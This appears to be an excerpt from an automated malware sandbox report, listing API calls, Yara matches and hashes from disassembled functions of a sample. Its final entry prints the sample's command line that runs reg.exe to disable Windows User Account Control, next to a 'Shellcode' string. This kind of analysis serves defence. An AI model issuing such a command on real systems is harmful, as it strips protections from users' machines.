                                                                                                                                                                • Instruction Fuzzy Hash: 4B51B3B1D01648DBEB20CFA8D84479EBFB9FF46314F20011AE814BB340EB755944CB91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00076284: __EH_prolog.LIBCMT ref: 00076289
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,000C2774), ref: 00076134
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0007613D
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0007614C
                                                                                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00076100
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                                • String ID: <$@$Temp
                                                                                                                                                                • API String ID: 1704390241-1032778388
                                                                                                                                                                • Opcode ID: 595bbe002879234caa93ac9520a3c846cb7f6491fd1f21b92d9f4fcb12e0e570
                                                                                                                                                                • Instruction ID: ff28b374ceac5651e4c6e1cfe5512d8ac32b4251e6b73ac0b56b3bbc92f92f22
                                                                                                                                                                • Opcode Fuzzy Hash: 595bbe002879234caa93ac9520a3c846cb7f6491fd1f21b92d9f4fcb12e0e570
                                                                                                                                                                • Instruction Fuzzy Hash: D2415031A046099BEB14FB60DC56FEEB77AAF10300F504268F50A661E3DF795A89CB91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 0006745E
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 000674A6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 000674E0
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 000674F8
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 0006751C
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0006752B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                                                                                                                                                • String ID: .part
                                                                                                                                                                • API String ID: 820096542-3499674018
                                                                                                                                                                • Opcode ID: 3195e6a5e91192617a20816430c4f1bbc4eac7866fb9f3d7f622e59b4d7ce52f
                                                                                                                                                                • Instruction ID: e44a325b0253e4bfdb59896d0770276d274c5277b7acd807f07b7310892b5e2b
                                                                                                                                                                • Opcode Fuzzy Hash: 3195e6a5e91192617a20816430c4f1bbc4eac7866fb9f3d7f622e59b4d7ce52f
                                                                                                                                                                • Instruction Fuzzy Hash: CC315871D00219ABDB04EFA4DC8A9EEB77AFF08310F10856AF811A3242DF746E44CB60
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0008B9D1,?,?,?,000A64D7,00000001,00000001,?), ref: 000A62E0
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 000A6318
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0008B9D1,?,?,?,000A64D7,00000001,00000001,?), ref: 000A6366
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 000A63FD
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000A6460
                                                                                                                                                                • __freea.LIBCMT ref: 000A646D
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                • __freea.LIBCMT ref: 000A6476
                                                                                                                                                                • __freea.LIBCMT ref: 000A649B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3864826663-0
                                                                                                                                                                • Opcode ID: 65913d1f976b4083ed7407f3351f9d706940f9464b2ec486a9cc4fd3cb3e470e
                                                                                                                                                                • Instruction ID: 5d6aa831f965fce0a0b91dd2b49722cf823f7378a64551691e4c14e56a1ce7cd
                                                                                                                                                                • Opcode Fuzzy Hash: 65913d1f976b4083ed7407f3351f9d706940f9464b2ec486a9cc4fd3cb3e470e
                                                                                                                                                                • Instruction Fuzzy Hash: F151D572600216AFEF258FA4CC41EEF77F9EB46750F194628FD05EA141DB36DD4086A0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                • Opcode ID: df27ad26c0ca7bb847937b8044854fb6828265a1c7ba2084fc8d6cd1c4f4517d
                                                                                                                                                                • Instruction ID: edc316a14ece5d07c2e17962dcbf77bea9ad7ae76efdbab789b14decab398152
                                                                                                                                                                • Opcode Fuzzy Hash: df27ad26c0ca7bb847937b8044854fb6828265a1c7ba2084fc8d6cd1c4f4517d
                                                                                                                                                                • Instruction Fuzzy Hash: 3DB114729043599FDB018F68CC91BEE7FA5EF56318F24415AE844AF389E774A901C7B0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: b88bbf764e64fee258903e57f37d3f4e4f518c79a1f6a117d43c188704286c30
                                                                                                                                                                • Instruction ID: 9d4b3bc7db251bed0b0c15493a8cd8a18d94802e7b25220a3d0ded39bc4c12ef
                                                                                                                                                                • Opcode Fuzzy Hash: b88bbf764e64fee258903e57f37d3f4e4f518c79a1f6a117d43c188704286c30
                                                                                                                                                                • Instruction Fuzzy Hash: FB61D571901216AFDF20EF68C841B9ABBF6FF45720F144569E858EB240E770AD41CF98
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                • _free.LIBCMT ref: 000A4451
                                                                                                                                                                • _free.LIBCMT ref: 000A4468
                                                                                                                                                                • _free.LIBCMT ref: 000A4487
                                                                                                                                                                • _free.LIBCMT ref: 000A44A2
                                                                                                                                                                • _free.LIBCMT ref: 000A44B9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                                • String ID: w;
                                                                                                                                                                • API String ID: 3033488037-1922605537
                                                                                                                                                                • Opcode ID: cb65a1e2cfc189b91eec8a44ec24704b4ee6f7f84aff9380e1e32a636c79f685
                                                                                                                                                                • Instruction ID: b02cd2494bbd5a20ad39199121c3f5fea9621589291477a8b94bbf8f5f5828d7
                                                                                                                                                                • Opcode Fuzzy Hash: cb65a1e2cfc189b91eec8a44ec24704b4ee6f7f84aff9380e1e32a636c79f685
                                                                                                                                                                • Instruction Fuzzy Hash: B551C436A00704AFDB60DFA9C841BAA77F4EF9A720F14466DE909DB251E7B5ED01CB40
                                                                                                                                                                APIs
                                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                APIs
                                                                                                                                                                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,6FEA5179,?), ref: 6FE7EFC4
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000001), ref: 6FE7F06B
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6FE7F09E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value$AddressSingleWake
                                                                                                                                                                • String ID: yQo$o&$o&
                                                                                                                                                                • API String ID: 232517740-3584872725
                                                                                                                                                                • Opcode ID: d74055cf24891127288e25555408042d82c231270f1bae314e42172c42e50d65
                                                                                                                                                                • Instruction ID: e48ba57f910c1a29a08dc5a27acafc368361030eed3ebbcbb4e8b87b427a7ca1
                                                                                                                                                                • Opcode Fuzzy Hash: d74055cf24891127288e25555408042d82c231270f1bae314e42172c42e50d65
                                                                                                                                                                • Instruction Fuzzy Hash: D24115B19006499FDB24CF58C844BEE7FB5FF4632CF240169E514AB790DB35A845CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6FE93D87
                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6FE93D8F
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6FE93E18
                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6FE93E43
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6FE93E98
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                • String ID: csm
                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                • Opcode ID: 97db3ce92591675723c383d2040b8d2c6c59d16bfd28f00e622f052158980895
                                                                                                                                                                • Instruction ID: f7231125fa0595b69f900cf636279d5b94971d1e18fcc3a12fddc66c4e5a4470
                                                                                                                                                                • Opcode Fuzzy Hash: 97db3ce92591675723c383d2040b8d2c6c59d16bfd28f00e622f052158980895
                                                                                                                                                                • Instruction Fuzzy Hash: C64163349003099FCF00DFA9CC95A9EBFB9BF46328F20815AE8185B395D731E955CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                • String ID: csm
                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0255F3F7
                                                                                                                                                                • int.LIBCPMT ref: 0255F40A
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::_Lockit.LIBCPMT ref: 0255CC49
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::~_Lockit.LIBCPMT ref: 0255CC63
                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0255F413
                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0255F44A
                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0255F453
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0255F471
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0255F4B9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2409581025-0
                                                                                                                                                                • Opcode ID: 4ccb529b2c793de59ffa1319435df9f7247f56cfea9ee7c9dcdf8cb5ec2dfc6c
                                                                                                                                                                • Instruction ID: 13c3b98d7d5bacce3a24a547ed36af5bbdb4405236a224b4b2bbff2906fb3d89
                                                                                                                                                                • Opcode Fuzzy Hash: 4ccb529b2c793de59ffa1319435df9f7247f56cfea9ee7c9dcdf8cb5ec2dfc6c
                                                                                                                                                                • Instruction Fuzzy Hash: 51213732400136EBC700FB68C9629AE776AFF81320B10421BEC40F7690DF75A9018F9D
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,6FE989DF,00000000,6FE980F4,00000000,00000000,00000001,?,6FE98B58,00000022,FlsSetValue,6FEB2308,6FEB2310,00000000), ref: 6FE98991
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                • Opcode ID: ad4ba9d2b9aa923bd5bbddb922daa918aab1486830502950cd8cbaf45d7f0c71
                                                                                                                                                                • Instruction ID: a212ccdc8af1e253005f6f09d5475b063240cc93438bf384608b82dc5b00c77e
                                                                                                                                                                • Opcode Fuzzy Hash: ad4ba9d2b9aa923bd5bbddb922daa918aab1486830502950cd8cbaf45d7f0c71
                                                                                                                                                                • Instruction Fuzzy Hash: 1021C635508611ABCB219B68DC40A4E3F68EF53779F700126E959A72B1D734EB11C6B1
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: f0b1b3cef5ee600502cac9cc827a00046fd7a72ae26d3d65b96edc04095a00f7
                                                                                                                                                                • Instruction ID: 0de280fe1ac6a66d7ddf80b81830be1b549c75bf024564c4291e1a182cbf0f41
                                                                                                                                                                • Opcode Fuzzy Hash: f0b1b3cef5ee600502cac9cc827a00046fd7a72ae26d3d65b96edc04095a00f7
                                                                                                                                                                • Instruction Fuzzy Hash: DB115471541B16AADE20B770CC46FCF77AEBF80700F804829F29DA7050DB6AB5145E58
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0255F6F2
                                                                                                                                                                • int.LIBCPMT ref: 0255F705
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::_Lockit.LIBCPMT ref: 0255CC49
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::~_Lockit.LIBCPMT ref: 0255CC63
                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0255F70E
                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0255F745
                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0255F74E
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0255F76C
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 0255F77B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2287991272-0
                                                                                                                                                                • Opcode ID: 48464c10bc606b213792967713735e740304ad471cfb65aa1aff1fbeafdbedbf
                                                                                                                                                                • Instruction ID: 482d99fa05513feb8299f81f6bf6cee85aa596455c5bafd1bdf729ad4334ad27
                                                                                                                                                                • Opcode Fuzzy Hash: 48464c10bc606b213792967713735e740304ad471cfb65aa1aff1fbeafdbedbf
                                                                                                                                                                • Instruction Fuzzy Hash: D011E73650022AB7CB10FBA8D8658DDBB6AFF81360F100167EC54B7650DB71DE408BD9
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000,00000000,Shellcode,000D2318), ref: 00067285
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0006DD38,00000027), ref: 00067294
